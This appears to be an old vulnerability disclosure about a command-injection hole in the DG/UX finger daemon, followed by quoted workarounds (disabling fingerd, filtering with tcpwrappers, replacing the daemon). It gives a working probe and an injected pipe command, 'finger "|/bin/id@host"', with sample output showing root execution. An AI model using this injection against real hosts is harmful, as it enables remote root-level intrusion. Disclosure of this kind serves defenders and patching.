The finger daemon that ships with dgux will allow a remote user to pipe commands, often with uid root or bin. To check for this vulnerability, simply use the RFC compliant syntax; finger /W@host If it returns something like this, it may be vulnerable; Login name: /W In real life: ??? To see the uid in.fingerd is running as, try this; finger "|/bin/id@host" Often, you will see something like this; uid=0(root) gid=0(root) or; uid=2(bin) gid=2(bin) groups=2(bin),3(sys),5(mail) --------------------------------------------------------------------------- > > The only work arounds I can think of are: > > 1) disable fingerd > 2) use tcpwrappers, and have a wrapper program check for the offending pipe and > other shell specials 3) find a third party fingerd that DOESN'T have this wide > open door to root. >